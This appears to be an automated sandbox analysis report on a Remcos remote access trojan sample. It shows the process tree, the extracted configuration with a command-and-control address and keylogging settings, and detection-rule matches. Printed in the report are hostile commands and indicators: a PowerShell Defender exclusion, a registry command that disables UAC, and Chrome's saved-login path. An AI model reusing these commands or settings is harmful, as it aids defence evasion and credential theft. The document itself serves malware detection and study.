            • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5664 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 2192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6524 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6624 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 3332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9900 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9752 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 10528 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 10592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 11168 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 3660 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 10040 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 11700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 11904 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 12044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 12224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9240 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 11688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • WerFault.exe (PID: 7540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\graias\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings
00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown | matched strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown | matched strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
0.2.4XYAW8PbZH.exe.4425c30.4.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0.2.4XYAW8PbZH.exe.4425c30.4.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0.2.4XYAW8PbZH.exe.4425c30.4.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0.2.4XYAW8PbZH.exe.4425c30.4.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown | matched strings:
  • 0x69ef8:$a1: Remcos restarted by watchdog!
  • 0x6a470:$a3: %02i:%02i:%02i:%03i
0.2.4XYAW8PbZH.exe.4425c30.4.unpack | REMCOS_RAT_variants | unknown | unknown | matched strings:
  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64204:$str_b2: Executing file:
  • 0x6503c:$str_b3: GetDirectListeningPort
  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x64b80:$str_b7: \update.vbs
  • 0x6422c:$str_b9: Downloaded file:
  • 0x64218:$str_b10: Downloading file:
  • 0x642bc:$str_b12: Failed to upload file:
  • 0x65004:$str_b13: StartForward
  • 0x65024:$str_b14: StopForward
  • 0x64ad8:$str_b15: fso.DeleteFile "
  • 0x64a6c:$str_b16: On Error Resume Next
  • 0x64b08:$str_b17: fso.DeleteFolder "
  • 0x642ac:$str_b18: Uploaded file:
  • 0x6426c:$str_b19: Unable to delete:
  • 0x64aa0:$str_b20: while fso.FileExists("
  • 0x64749:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 185.234.72.215, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, Initiated: true, ProcessId: 7328, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
